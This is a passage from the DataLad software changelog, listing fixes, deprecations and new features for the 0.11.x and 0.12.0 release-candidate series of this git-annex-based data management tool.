subdataset is moved to the registered commit if the registered\n commit is an ancestor of the subdataset’s HEAD commit. This handling\n has been moved to a more central location within ``GitRepo``, and now\n applies to any ``update_submodule(..., init=True)`` call.\n (`#3831 <https://github.com/datalad/datalad/issues/3831>`__)\n\n- The output of ``datalad -h`` has been reformatted to improve\n readability.\n (`#3862 <https://github.com/datalad/datalad/issues/3862>`__)\n\n- `unlock <http://datalad.readthedocs.io/en/latest/generated/man/datalad-unlock.html>`__\n has been sped up.\n (`#3880 <https://github.com/datalad/datalad/issues/3880>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n learned to provide and render more information about discovered\n procedures, including whether the procedure is overridden by another\n procedure with the same base name.\n (`#3960 <https://github.com/datalad/datalad/issues/3960>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n now (`#3817 <https://github.com/datalad/datalad/issues/3817>`__)\n\n - records the active branch in the superdataset when registering a\n new subdataset.\n - calls ``git annex sync`` when saving a dataset on an adjusted\n branch so that the changes are brought into the mainline branch.\n\n- `subdatasets <http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n now aborts when its ``dataset`` argument points to a non-existent\n dataset. (`#3940 <https://github.com/datalad/datalad/issues/3940>`__)\n\n- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__\n now\n\n - reports the dataset ID if the current working directory is\n visiting a dataset.\n (`#3888 <https://github.com/datalad/datalad/issues/3888>`__)\n - outputs entries deterministically.\n (`#3927 <https://github.com/datalad/datalad/issues/3927>`__)\n\n- The ``ConfigManager`` class\n\n - learned to exclude ``.datalad/config`` as a source of\n configuration values, restricting the sources to standard Git\n configuration files, when called with ``source=\"local\"``.\n (`#3907 <https://github.com/datalad/datalad/issues/3907>`__)\n - accepts a value of “override” for its ``where`` argument to allow\n Python callers to more convenient override configuration.\n (`#3970 <https://github.com/datalad/datalad/issues/3970>`__)\n\n- Commands now accept a ``dataset`` value of “^.” as shorthand for “the\n dataset to which the current directory belongs”.\n (`#3242 <https://github.com/datalad/datalad/issues/3242>`__)\n\n0.12.0rc6 (Oct 19, 2019) – some releases are better than the others\n===================================================================\n\nbet we will fix some bugs and make a world even a better place.\n\n.. _major-refactoring-and-deprecations-5:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- DataLad no longer supports Python 2. The minimum supported version of\n Python is now 3.5.\n (`#3629 <https://github.com/datalad/datalad/issues/3629>`__)\n\n- Much of the user-focused content at http://docs.datalad.org has been\n removed in favor of more up to date and complete material available\n in the `DataLad Handbook <http://handbook.datalad.org>`__. Going\n forward, the plan is to restrict http://docs.datalad.org to technical\n documentation geared at developers.\n (`#3678 <https://github.com/datalad/datalad/issues/3678>`__)\n\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n used to allow the caller to specify which dataset(s) to update as a\n ``PATH`` argument or via the the ``--dataset`` option; now only the\n latter is supported. Path arguments only serve to restrict which\n subdataset are updated when operating recursively.\n (`#3700 <https://github.com/datalad/datalad/issues/3700>`__)\n\n- Result records from a\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n call no longer have a “state” key.\n (`#3746 <https://github.com/datalad/datalad/issues/3746>`__)\n\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n and\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n no longer support operating on independent hierarchies of datasets.\n (`#3700 <https://github.com/datalad/datalad/issues/3700>`__)\n (`#3746 <https://github.com/datalad/datalad/issues/3746>`__)\n\n- The\n `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n update in 0.12.0rc4 for the new path resolution logic broke the\n handling of inputs and outputs for calls from a subdirectory.\n (`#3747 <https://github.com/datalad/datalad/issues/3747>`__)\n\n- The ``is_submodule_modified`` method of ``GitRepo`` as well as two\n helper functions in gitrepo.py, ``kwargs_to_options`` and\n ``split_remote_branch``, were no longer used internally or in any\n known DataLad extensions and have been removed.\n (`#3702 <https://github.com/datalad/datalad/issues/3702>`__)\n (`#3704 <https://github.com/datalad/datalad/issues/3704>`__)\n\n- The ``only_remote`` option of ``GitRepo.is_with_annex`` was not used\n internally or in any known extensions and has been dropped.\n (`#3768 <https://github.com/datalad/datalad/issues/3768>`__)\n\n- The ``get_tags`` method of ``GitRepo`` used to sort tags by committer\n date. It now sorts them by the tagger date for annotated tags and the\n committer date for lightweight tags.\n (`#3715 <https://github.com/datalad/datalad/issues/3715>`__)\n\n- The ``rev_resolve_path`` substituted ``resolve_path`` helper.\n (`#3797 <https://github.com/datalad/datalad/issues/3797>`__)\n\n.. _fixes-21:\n\nFixes\n-----\n\n- Correctly handle relative paths in\n `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__.\n (`#3799 <https://github.com/datalad/datalad/issues/3799>`__)\n (`#3102 <https://github.com/datalad/datalad/issues/3102>`__)\n\n- Do not erroneously discover directory as a procedure.\n (`#3793 <https://github.com/datalad/datalad/issues/3793>`__)\n\n- Correctly extract version from manpage to trigger use of manpages for\n ``--help``.\n (`#3798 <https://github.com/datalad/datalad/issues/3798>`__)\n\n- The ``cfg_yoda`` procedure saved all modifications in the repository\n rather than saving only the files it modified.\n (`#3680 <https://github.com/datalad/datalad/issues/3680>`__)\n\n- Some spots in the documentation that were supposed appear as two\n hyphens were incorrectly rendered in the HTML output en-dashs.\n (`#3692 <https://github.com/datalad/datalad/issues/3692>`__)\n\n- `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__,\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__,\n and\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n treated paths as relative to the dataset even when the string form\n was given, violating the new path handling rules.\n (`#3749 <https://github.com/datalad/datalad/issues/3749>`__)\n (`#3777 <https://github.com/datalad/datalad/issues/3777>`__)\n (`#3780 <https://github.com/datalad/datalad/issues/3780>`__)\n\n- Providing the “^” shortcut to ``--dataset`` didn’t work properly when\n called from a subdirectory of a subdataset.\n (`#3772 <https://github.com/datalad/datalad/issues/3772>`__)\n\n- We failed to propagate some errors from git-annex when working with\n its JSON output.\n (`#3751 <https://github.com/datalad/datalad/issues/3751>`__)\n\n- With the Python API, callers are allowed to pass a string or list of\n strings as the ``cfg_proc`` argument to\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__,\n but the string form was mishandled.\n (`#3761 <https://github.com/datalad/datalad/issues/3761>`__)\n\n- Incorrect command quoting for SSH calls on Windows that rendered\n basic SSH-related functionality (e.g.,\n `sshrun <http://datalad.readthedocs.io/en/latest/generated/man/datalad-sshrun.html>`__)\n on Windows unusable.\n (`#3688 <https://github.com/datalad/datalad/issues/3688>`__)\n\n- Annex JSON result handling assumed platform-specific paths on Windows\n instead of the POSIX-style that is happening across all platforms.\n (`#3719 <https://github.com/datalad/datalad/issues/3719>`__)\n\n- ``path_is_under()`` was incapable of comparing Windows paths with\n different drive letters.\n (`#3728 <https://github.com/datalad/datalad/issues/3728>`__)\n\n.. _enhancements-and-new-features-20:\n\nEnhancements and new features\n-----------------------------\n\n- Provide a collection of “public” ``call_git*`` helpers within GitRepo\n and replace use of “private” and less specific\n ``_git_custom_command`` calls.\n (`#3791 <https://github.com/datalad/datalad/issues/3791>`__)\n\n- `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n gained a ``--report-filetype``. Setting it to “raw” can give a\n performance boost for the price of no longer distinguishing symlinks\n that point to annexed content from other symlinks.\n (`#3701 <https://github.com/datalad/datalad/issues/3701>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n disables file type reporting by\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n to improve performance.\n (`#3712 <https://github.com/datalad/datalad/issues/3712>`__)\n\n- `subdatasets <http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n (`#3743 <https://github.com/datalad/datalad/issues/3743>`__)\n\n - now extends its result records with a ``contains`` field that\n lists which ``contains`` arguments matched a given subdataset.\n - yields an ‘impossible’ result record when a ``contains`` argument\n wasn’t matched to any of the reported subdatasets.\n\n- `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n now shows more readable output when cloning fails.\n (`#3775 <https://github.com/datalad/datalad/issues/3775>`__)\n\n- ``SSHConnection`` now displays a more informative error message when\n it cannot start the ``ControlMaster`` process.\n (`#3776 <https://github.com/datalad/datalad/issues/3776>`__)\n\n- If the new configuration option ``datalad.log.result-level`` is set\n to a single level, all result records will be logged at that level.\n If you’ve been bothered by DataLad’s double reporting of failures,\n consider setting this to “debug”.\n (`#3754 <https://github.com/datalad/datalad/issues/3754>`__)\n\n- Configuration values from ``datalad -c OPTION=VALUE ...`` are now\n validated to provide better errors.\n (`#3695 <https://github.com/datalad/datalad/issues/3695>`__)\n\n- `rerun <https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html>`__\n learned how to handle history with merges. As was already the case\n when cherry picking non-run commits, re-creating merges may results\n in conflicts, and ``rerun`` does not yet provide an interface to let\n the user handle these.\n (`#2754 <https://github.com/datalad/datalad/issues/2754>`__)\n\n- The ``fsck`` method of ``AnnexRepo`` has been enhanced to expose more\n features of the underlying ``git fsck`` command.\n (`#3693 <https://github.com/datalad/datalad/issues/3693>`__)\n\n- ``GitRepo`` now has a ``for_each_ref_`` method that wraps\n ``git for-each-ref``, which is used in various spots that used to\n rely on GitPython functionality.\n (`#3705 <https://github.com/datalad/datalad/issues/3705>`__)\n\n- Do not pretend to be able to work in optimized (``python -O``) mode,\n crash early with an informative message.\n (`#3803 <https://github.com/datalad/datalad/issues/3803>`__)\n\n0.12.0rc5 (September 04, 2019) – .\n==================================\n\nVarious fixes and enhancements that bring the 0.12.0 release closer.\n\n.. _major-refactoring-and-deprecations-6:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The two modules below have a new home. The old locations still exist\n as compatibility shims and will be removed in a future release.\n\n - ``datalad.distribution.subdatasets`` has been moved to\n ``datalad.local.subdatasets``\n (`#3429 <https://github.com/datalad/datalad/issues/3429>`__)\n - ``datalad.interface.run`` has been moved to\n ``datalad.core.local.run``\n (`#3444 <https://github.com/datalad/datalad/issues/3444>`__)\n\n- The ``lock`` method of ``AnnexRepo`` and the ``options`` parameter of\n ``AnnexRepo.unlock`` were unused internally and have been removed.\n (`#3459 <https://github.com/datalad/datalad/issues/3459>`__)\n\n- The ``get_submodules`` method of ``GitRepo`` has been rewritten\n without GitPython. When the new ``compat`` flag is true (the current\n default), the method returns a value that is compatible with the old\n return value. This backwards-compatible return value and the\n ``compat`` flag will be removed in a future release.\n (`#3508 <https://github.com/datalad/datalad/issues/3508>`__)\n\n- The logic for resolving relative paths given to a command has changed\n (`#3435 <https://github.com/datalad/datalad/issues/3435>`__). The new\n rule is that relative paths are taken as relative to the dataset only\n if a dataset *instance* is passed by the caller. In all other\n scenarios they’re considered relative to the current directory.\n\n The main user-visible difference from the command line is that using\n the ``--dataset`` argument does *not* result in relative paths being\n taken as relative to the specified dataset. (The undocumented\n distinction between “rel/path” and “./rel/path” no longer exists.)\n\n All commands under ``datalad.core`` and ``datalad.local``, as well as\n ``unlock`` and ``addurls``, follow the new logic. The goal is for all\n commands to eventually do so.\n\n.. _fixes-22:\n\nFixes\n-----\n\n- The function for loading JSON streams wasn’t clever enough to handle\n content that included a Unicode line separator like U2028.\n (`#3524 <https://github.com/datalad/datalad/issues/3524>`__)\n\n- When\n `unlock <http://datalad.readthedocs.io/en/latest/generated/man/datalad-unlock.html>`__\n was called without an explicit target (i.e., a directory or no paths\n at all), the call failed if any of the files did not have content\n present. (`#3459 <https://github.com/datalad/datalad/issues/3459>`__)\n\n- ``AnnexRepo.get_content_info`` failed in the rare case of a key\n without size information.\n (`#3534 <https://github.com/datalad/datalad/issues/3534>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n ignored ``--on-failure`` in its underlying call to\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__.\n (`#3470 <https://github.com/datalad/datalad/issues/3470>`__)\n\n- Calling\n `remove <http://datalad.readthedocs.io/en/latest/generated/man/datalad-remove.html>`__\n with a subdirectory displayed spurious warnings about the\n subdirectory files not existing.\n (`#3586 <https://github.com/datalad/datalad/issues/3586>`__)\n\n- Our processing of ``git-annex --json`` output mishandled info\n messages from special remotes.\n (`#3546 <https://github.com/datalad/datalad/issues/3546>`__)\n\n- `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n\n - didn’t bypass the “existing subdataset” check when called with\n ``--force`` as of 0.12.0rc3\n (`#3552 <https://github.com/datalad/datalad/issues/3552>`__)\n - failed to register the up-to-date revision of a subdataset when\n ``--cfg-proc`` was used with ``--dataset``\n (`#3591 <https://github.com/datalad/datalad/issues/3591>`__)\n\n- The base downloader had some error handling that wasn’t compatible\n with Python 3.\n (`#3622 <https://github.com/datalad/datalad/issues/3622>`__)\n\n- Fixed a number of Unicode py2-compatibility issues.\n (`#3602 <https://github.com/datalad/datalad/issues/3602>`__)\n\n- ``AnnexRepo.get_content_annexinfo`` did not properly chunk file\n arguments to avoid exceeding the command-line character limit.\n (`#3587 <https://github.com/datalad/datalad/issues/3587>`__)\n\n.. _enhancements-and-new-features-21:\n\nEnhancements and new features\n-----------------------------\n\n- New command ``create-sibling-gitlab`` provides an interface for\n creating a publication target on a GitLab instance.\n (`#3447 <https://github.com/datalad/datalad/issues/3447>`__)\n\n- `subdatasets <http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n (`#3429 <https://github.com/datalad/datalad/issues/3429>`__)\n\n - now supports path-constrained queries in the same manner as\n commands like ``save`` and ``status``\n - gained a ``--contains=PATH`` option that can be used to restrict\n the output to datasets that include a specific path.\n - now narrows the listed subdatasets to those underneath the current\n directory when called with no arguments\n\n- `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n learned to accept a plain ``--annex`` (no value) as shorthand for\n ``--annex basic``.\n (`#3534 <https://github.com/datalad/datalad/issues/3534>`__)\n\n- The ``.dirty`` property of ``GitRepo`` and ``AnnexRepo`` has been\n sped up. (`#3460 <https://github.com/datalad/datalad/issues/3460>`__)\n\n- The ``get_content_info`` method of ``GitRepo``, used by ``status``\n and commands that depend on ``status``, now restricts its git calls\n to a subset of files, if possible, for a performance gain in\n repositories with many files.\n (`#3508 <https://github.com/datalad/datalad/issues/3508>`__)\n\n- Extensions that do not provide a command, such as those that provide\n only metadata extractors, are now supported.\n (`#3531 <https://github.com/datalad/datalad/issues/3531>`__)\n\n- When calling git-annex with ``--json``, we log standard error at the\n debug level rather than the warning level if a non-zero exit is\n expected behavior.\n (`#3518 <https://github.com/datalad/datalad/issues/3518>`__)\n\n- `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n no longer refuses to create a new dataset in the odd scenario of an\n empty .git/ directory upstairs.\n (`#3475 <https://github.com/datalad/datalad/issues/3475>`__)\n\n- As of v2.22.0 Git treats a sub-repository on an unborn branch as a\n repository rather than as a directory. Our documentation and tests\n have been updated appropriately.\n (`#3476 <https://github.com/datalad/datalad/issues/3476>`__)\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n learned to accept a ``--cfg-proc`` value and pass it to its\n ``create`` calls.\n (`#3562 <https://github.com/datalad/datalad/issues/3562>`__)\n\n0.12.0rc4 (May 15, 2019) – the revolution is over\n=================================================\n\nWith the replacement of the ``save`` command implementation with\n``rev-save`` the revolution effort is now over, and the set of key\ncommands for local dataset operations (``create``, ``run``, ``save``,\n``status``, ``diff``) is now complete. This new core API is available\nfrom ``datalad.core.local`` (and also via ``datalad.api``, as any other\ncommand).\n\n.. _major-refactoring-and-deprecations-7:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The ``add`` command is now deprecated. It will be removed in a future\n release.\n\n.. _fixes-23:\n\nFixes\n-----\n\n- Remove hard-coded dependencies on POSIX path conventions in SSH\n support code\n (`#3400 <https://github.com/datalad/datalad/issues/3400>`__)\n\n- Emit an ``add`` result when adding a new subdataset during\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n (`#3398 <https://github.com/datalad/datalad/issues/3398>`__)\n\n- SSH file transfer now actually opens a shared connection, if none\n exists yet\n (`#3403 <https://github.com/datalad/datalad/issues/3403>`__)\n\n.. _enhancements-and-new-features-22:\n\nEnhancements and new features\n-----------------------------\n\n- ``SSHConnection`` now offers methods for file upload and download\n (``get()``, ``put()``. The previous ``copy()`` method only supported\n upload and was discontinued\n (`#3401 <https://github.com/datalad/datalad/issues/3401>`__)\n\n0.12.0rc3 (May 07, 2019) – the revolution continues\n===================================================\n\nContinues API consolidation and replaces the ``create`` and ``diff``\ncommand with more performant implementations.\n\n.. _major-refactoring-and-deprecations-8:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The previous ``diff`` command has been replaced by the diff variant\n from the\n `datalad-revolution <http://github.com/datalad/datalad-revolution>`__\n extension.\n (`#3366 <https://github.com/datalad/datalad/issues/3366>`__)\n\n- ``rev-create`` has been renamed to ``create``, and the previous\n ``create`` has been removed.\n (`#3383 <https://github.com/datalad/datalad/issues/3383>`__)\n\n- The procedure ``setup_yoda_dataset`` has been renamed to ``cfg_yoda``\n (`#3353 <https://github.com/datalad/datalad/issues/3353>`__).\n\n- The ``--nosave`` of ``addurls`` now affects only added content, not\n newly created subdatasets\n (`#3259 <https://github.com/datalad/datalad/issues/3259>`__).\n\n- ``Dataset.get_subdatasets`` (deprecated since v0.9.0) has been\n removed. (`#3336 <https://github.com/datalad/datalad/issues/3336>`__)\n\n- The ``.is_dirty`` method of ``GitRepo`` and ``AnnexRepo`` has been\n replaced by ``.status`` or, for a subset of cases, the ``.dirty``\n property.\n (`#3330 <https://github.com/datalad/datalad/issues/3330>`__)\n\n- ``AnnexRepo.get_status`` has been replaced by ``AnnexRepo.status``.\n (`#3330 <https://github.com/datalad/datalad/issues/3330>`__)\n\n.. _fixes-24:\n\nFixes\n-----\n\n- `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n\n - reported on directories that contained only ignored files\n (`#3238 <https://github.com/datalad/datalad/issues/3238>`__)\n - gave a confusing failure when called from a subdataset with an\n explicitly specified dataset argument and “.” as a path\n (`#3325 <https://github.com/datalad/datalad/issues/3325>`__)\n - misleadingly claimed that the locally present content size was\n zero when ``--annex basic`` was specified\n (`#3378 <https://github.com/datalad/datalad/issues/3378>`__)\n\n- An informative error wasn’t given when a download provider was\n invalid. (`#3258 <https://github.com/datalad/datalad/issues/3258>`__)\n\n- Calling ``rev-save PATH`` saved unspecified untracked subdatasets.\n (`#3288 <https://github.com/datalad/datalad/issues/3288>`__)\n\n- The available choices for command-line options that take values are\n now displayed more consistently in the help output.\n (`#3326 <https://github.com/datalad/datalad/issues/3326>`__)\n\n- The new pathlib-based code had various encoding issues on Python 2.\n (`#3332 <https://github.com/datalad/datalad/issues/3332>`__)\n\n.. _enhancements-and-new-features-23:\n\nEnhancements and new features\n-----------------------------\n\n- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__\n now includes information about the Python version.\n (`#3255 <https://github.com/datalad/datalad/issues/3255>`__)\n\n- When operating in an annex repository, checking whether git-annex is\n available is now delayed until a call to git-annex is actually\n needed, allowing systems without git-annex to operate on annex\n repositories in a restricted fashion.\n (`#3274 <https://github.com/datalad/datalad/issues/3274>`__)\n\n- The ``load_stream`` on helper now supports auto-detection of\n compressed files.\n (`#3289 <https://github.com/datalad/datalad/issues/3289>`__)\n\n- ``create`` (formerly ``rev-create``)\n\n - learned to be speedier by passing a path to ``status``\n (`#3294 <https://github.com/datalad/datalad/issues/3294>`__)\n - gained a ``--cfg-proc`` (or ``-c``) convenience option for running\n configuration procedures (or more accurately any procedure that\n begins with “cfg\\_”) in the newly created dataset\n (`#3353 <https://github.com/datalad/datalad/issues/3353>`__)\n\n- ``AnnexRepo.set_metadata`` now returns a list while\n ``AnnexRepo.set_metadata_`` returns a generator, a behavior which is\n consistent with the ``add`` and ``add_`` method pair.\n (`#3298 <https://github.com/datalad/datalad/issues/3298>`__)\n\n- ``AnnexRepo.get_metadata`` now supports batch querying of known annex\n files. Note, however, that callers should carefully validate the\n input paths because the batch call will silently hang if given\n non-annex files.\n (`#3364 <https://github.com/datalad/datalad/issues/3364>`__)\n\n- `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n\n - now reports a “bytesize” field for files tracked by Git\n (`#3299 <https://github.com/datalad/datalad/issues/3299>`__)\n - gained a new option ``eval_subdataset_state`` that controls how\n the subdataset state is evaluated. Depending on the information\n you need, you can select a less expensive mode to make ``status``\n faster.\n (`#3324 <https://github.com/datalad/datalad/issues/3324>`__)\n - colors deleted files “red”\n (`#3334 <https://github.com/datalad/datalad/issues/3334>`__)\n\n- Querying repository content is faster due to batching of\n ``git cat-file`` calls.\n (`#3301 <https://github.com/datalad/datalad/issues/3301>`__)\n\n- The dataset ID of a subdataset is now recorded in the superdataset.\n (`#3304 <https://github.com/datalad/datalad/issues/3304>`__)\n\n- ``GitRepo.diffstatus``\n\n - now avoids subdataset recursion when the comparison is not with\n the working tree, which substantially improves performance when\n diffing large dataset hierarchies\n (`#3314 <https://github.com/datalad/datalad/issues/3314>`__)\n - got smarter and faster about labeling a subdataset as “modified”\n (`#3343 <https://github.com/datalad/datalad/issues/3343>`__)\n\n- ``GitRepo.get_content_info`` now supports disabling the file type\n evaluation, which gives a performance boost in cases where this\n information isn’t needed.\n (`#3362 <https://github.com/datalad/datalad/issues/3362>`__)\n\n- The XMP metadata extractor now filters based on file name to improve\n its performance.\n (`#3329 <https://github.com/datalad/datalad/issues/3329>`__)\n\n0.12.0rc2 (Mar 18, 2019) – revolution!\n======================================\n\n.. _fixes-25:\n\nFixes\n-----\n\n- ``GitRepo.dirty`` does not report on nested empty directories\n (`#3196 <https://github.com/datalad/datalad/issues/3196>`__).\n\n- ``GitRepo.save()`` reports results on deleted files.\n\n.. _enhancements-and-new-features-24:\n\nEnhancements and new features\n-----------------------------\n\n- Absorb a new set of core commands from the datalad-revolution\n extension:\n\n - ``rev-status``: like ``git status``, but simpler and working with\n dataset hierarchies\n - ``rev-save``: a 2-in-1 replacement for save and add\n - ``rev-create``: a ~30% faster create\n\n- JSON support tools can now read and write compressed files.\n\n0.12.0rc1 (Mar 03, 2019) – to boldly go …\n=========================================\n\n.. _major-refactoring-and-deprecations-9:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- Discontinued support for git-annex direct-mode (also no longer\n supported upstream).\n\n.. _enhancements-and-new-features-25:\n\nEnhancements and new features\n-----------------------------\n\n- Dataset and Repo object instances are now hashable, and can be\n created based on pathlib Path object instances\n\n- Imported various additional methods for the Repo classes to query\n information and save changes.\n\n0.11.8 (Oct 11, 2019) – annex-we-are-catching-up\n================================================\n\n.. _fixes-26:\n\nFixes\n-----\n\n- Our internal command runner failed to capture output in some cases.\n (`#3656 <https://github.com/datalad/datalad/issues/3656>`__)\n- Workaround in the tests around python in cPython >= 3.7.5 ‘;’ in the\n filename confusing mimetypes\n (`#3769 <https://github.com/datalad/datalad/issues/3769>`__)\n (`#3770 <https://github.com/datalad/datalad/issues/3770>`__)\n\n.. _enhancements-and-new-features-26:\n\nEnhancements and new features\n-----------------------------\n\n- Prepared for upstream changes in git-annex, including support for the\n latest git-annex\n\n - 7.20190912 auto-upgrades v5 repositories to v7.\n (`#3648 <https://github.com/datalad/datalad/issues/3648>`__)\n (`#3682 <https://github.com/datalad/datalad/issues/3682>`__)\n - 7.20191009 fixed treatment of (larger/smaller)than in\n .gitattributes\n (`#3765 <https://github.com/datalad/datalad/issues/3765>`__)\n\n- The ``cfg_text2git`` procedure, as well the ``--text-no-annex``\n option of\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__,\n now configure .gitattributes so that empty files are stored in git\n rather than annex.\n (`#3667 <https://github.com/datalad/datalad/issues/3667>`__)\n\n0.11.7 (Sep 06, 2019) – python2-we-still-love-you-but-…\n=======================================================\n\nPrimarily bugfixes with some optimizations and refactorings.\n\n.. _fixes-27:\n\nFixes\n-----\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n\n - now provides better handling when the URL file isn’t in the\n expected format.\n (`#3579 <https://github.com/datalad/datalad/issues/3579>`__)\n - always considered a relative file for the URL file argument as\n relative to the current working directory, which goes against the\n convention used by other commands of taking relative paths as\n relative to the dataset argument.\n (`#3582 <https://github.com/datalad/datalad/issues/3582>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n\n - hard coded “python” when formatting the command for non-executable\n procedures ending with “.py”. ``sys.executable`` is now used.\n (`#3624 <https://github.com/datalad/datalad/issues/3624>`__)\n - failed if arguments needed more complicated quoting than simply\n surrounding the value with double quotes. This has been resolved\n for systems that support ``shlex.quote``, but note that on Windows\n values are left unquoted.\n (`#3626 <https://github.com/datalad/datalad/issues/3626>`__)\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n now displays an informative error message if a local path is given to\n ``--url`` but ``--name`` isn’t specified.\n (`#3555 <https://github.com/datalad/datalad/issues/3555>`__)\n\n- `sshrun <http://datalad.readthedocs.io/en/latest/generated/man/datalad-sshrun.html>`__,\n the command DataLad uses for ``GIT_SSH_COMMAND``, didn’t support all\n the parameters that Git expects it to.\n (`#3616 <https://github.com/datalad/datalad/issues/3616>`__)\n\n- Fixed a number of Unicode py2-compatibility issues.\n (`#3597 <https://github.com/datalad/datalad/issues/3597>`__)\n\n- `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n now will create leading directories of the output path if they do not\n exist (`#3646 <https://github.com/datalad/datalad/issues/3646>`__)\n\n.. _enhancements-and-new-features-27:\n\nEnhancements and new features\n-----------------------------\n\n- The\n `annotate-paths <http://docs.datalad.org/en/latest/generated/man/datalad-annotate-paths.html>`__\n helper now caches subdatasets it has seen to avoid unnecessary calls.\n (`#3570 <https://github.com/datalad/datalad/issues/3570>`__)\n\n- A repeated configuration query has been dropped from the handling of\n ``--proc-pre`` and ``--proc-post``.\n (`#3576 <https://github.com/datalad/datalad/issues/3576>`__)\n\n- Calls to ``git annex find`` now use ``--in=.`` instead of the alias\n ``--in=here`` to take advantage of an optimization that git-annex (as\n of the current release, 7.20190730) applies only to the former.\n (`#3574 <https://github.com/datalad/datalad/issues/3574>`__)\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n now suggests close matches when the URL or file format contains an\n unknown field.\n (`#3594 <https://github.com/datalad/datalad/issues/3594>`__)\n\n- Shared logic used in the setup.py files of DataLad and its extensions\n has been moved to modules in the \\_datalad_build_support/ directory.\n (`#3600 <https://github.com/datalad/datalad/issues/3600>`__)\n\n- Get ready for upcoming git-annex dropping support for direct mode\n (`#3631 <https://github.com/datalad/datalad/issues/3631>`__)\n\n0.11.6 (Jul 30, 2019) – am I the last of 0.11.x?\n================================================\n\nPrimarily bug fixes to achieve more robust performance\n\n.. _fixes-28:\n\nFixes\n-----\n\n- Our tests needed various adjustments to keep up with upstream changes\n in Travis and Git.\n (`#3479 <https://github.com/datalad/datalad/issues/3479>`__)\n (`#3492 <https://github.com/datalad/datalad/issues/3492>`__)\n (`#3493 <https://github.com/datalad/datalad/issues/3493>`__)\n\n- ``AnnexRepo.is_special_annex_remote`` was too selective in what it\n considered to be a special remote.\n (`#3499 <https://github.com/datalad/datalad/issues/3499>`__)\n\n- We now provide information about unexpected output when git-annex is\n called with ``--json``.\n (`#3516 <https://github.com/datalad/datalad/issues/3516>`__)\n\n- Exception logging in the ``__del__`` method of ``GitRepo`` and\n ``AnnexRepo`` no longer fails if the names it needs are no longer\n bound. (`#3527 <https://github.com/datalad/datalad/issues/3527>`__)\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n botched the construction of subdataset paths that were more than two\n levels deep and failed to create datasets in a reliable,\n breadth-first order.\n (`#3561 <https://github.com/datalad/datalad/issues/3561>`__)\n\n- Cloning a ``type=git`` special remote showed a spurious warning about\n the remote not being enabled.\n (`#3547 <https://github.com/datalad/datalad/issues/3547>`__)\n\n.. _enhancements-and-new-features-28:\n\nEnhancements and new features\n-----------------------------\n\n- For calls to git and git-annex, we disable automatic garbage\n collection due to past issues with GitPython’s state becoming stale,\n but doing so results in a larger .git/objects/ directory that isn’t\n cleaned up until garbage collection is triggered outside of DataLad.\n Tests with the latest GitPython didn’t reveal any state issues, so\n we’ve re-enabled automatic garbage collection.\n (`#3458 <https://github.com/datalad/datalad/issues/3458>`__)\n\n- `rerun <https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html>`__\n learned an ``--explicit`` flag, which it relays to its calls to\n [run][[]]. This makes it possible to call ``rerun`` in a dirty\n working tree\n (`#3498 <https://github.com/datalad/datalad/issues/3498>`__).\n\n- The\n `metadata <http://datalad.readthedocs.io/en/latest/generated/man/datalad-metadata.html>`__\n command aborts earlier if a metadata extractor is unavailable.\n (`#3525 <https://github.com/datalad/datalad/issues/3525>`__)\n\n0.11.5 (May 23, 2019) – stability is not overrated\n==================================================\n\nShould be faster and less buggy, with a few enhancements.\n\n.. _fixes-29:\n\nFixes\n-----\n\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n 